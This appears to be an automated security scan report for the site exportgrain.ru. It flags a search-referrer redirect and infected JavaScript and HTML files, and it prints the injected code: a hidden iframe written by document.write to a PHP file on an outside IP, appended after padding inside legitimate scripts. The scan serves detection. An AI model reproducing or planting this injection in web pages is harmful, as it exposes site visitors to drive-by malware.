Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://exportgrain.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: exportgrain.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 07 Sep 2014 23:54:27 GMT Location: http://tinyurl.com/c2td3xs Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | malicious |
Scanned pages/files
Request | Server response | Status |
http://exportgrain.ru/ | 200 OK Content-Length: 25804 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
http://exportgrain.ru/media/system/js/caption.js | 200 OK Content-Length: 4375 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/templates/exportgrain/js/jquery.js | 200 OK Content-Length: 97255 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/templates/exportgrain/js/browser.js | 200 OK Content-Length: 3381 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CBS=function(){var b=navigator.userAgent.toLowerCase(),a=function(a){return-1<b.indexOf(a)},e=navigator.cookieEnabled?"iscookie":"nocookie",d=document.getElementsByTagName("html")[0];c=[!/opera|webtv/i.test(b)&&/msie\s(\d)/.test(b)?"ie ie"+RegExp.$1+(a("trident")&&a("msie 7.0")?" compat":""):a("firefox/2")?"gecko ff2":a("firefox/3")?"gecko ff3":a("firefox/4")?"gecko ff5":a("firefox/5")?"gecko ff5":a("gecko/")?"gecko":/opera(\s|\/)(\d+)/.test(b)?"opera opera"+RegExp.$2:a("k ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<!-- . -->;document.write('<iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"></iframe>'); <!-- . --> Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/templates/exportgrain/js/script.js | 200 OK Content-Length: 3565 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery(document).ready(function($) { CBS(); $('.contentheading').parent().parent().parent().removeClass('contentpaneopen'); $('#sidebar ul.menu li ul').each(function() { $(this).parent().append('<div class="child"></div>'); $(this).parent().find('div.child').append($(this)) }); $('#sidebar ul.menu li ul li ul').each(function() { $(this).parent().find('div.child').append($(this)) }); $('#jflanguagesele jQuery('#content').height(hs); } }); jQuery(window).load(function($){ var hs = jQuery('#sidebar').height(); var hc = jQuery('#content').height(); if(hs>hc) { jQuery('#content').height(hs); } });;document.write(''); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<!-- . -->;document.write('<iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"></iframe>'); <!-- . --> Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/modules/mod_flashrotator/js_flashrotator/swfobject.js | 200 OK Content-Length: 9347 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://exportgrain.ru/ru.html | 200 OK Content-Length: 25769 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
http://exportgrain.ru/en.html | 200 OK Content-Length: 25808 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
http://exportgrain.ru/en/kontakti.html | 200 OK Content-Length: 22381 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
http://exportgrain.ru/ru/kontakti.html | 200 OK Content-Length: 22454 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
http://exportgrain.ru/ru/ | 200 OK Content-Length: 25717 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) Antivirus reports:
http://exportgrain.ru/test404page.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://exportgrain.ru/js/jquery/jquery-1.4.4.min.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://exportgrain.ru/js/site_navigation.js | 404 Not Found Content-Length: 21090 Content-Type: text/html | clean |
http://exportgrain.ru/js/ | 404 Компонент не найден Content-Length: 1844 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exportgrain.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://exportgrain.ru/
Result: exportgrain.ru is not infected or malware details are not published yet.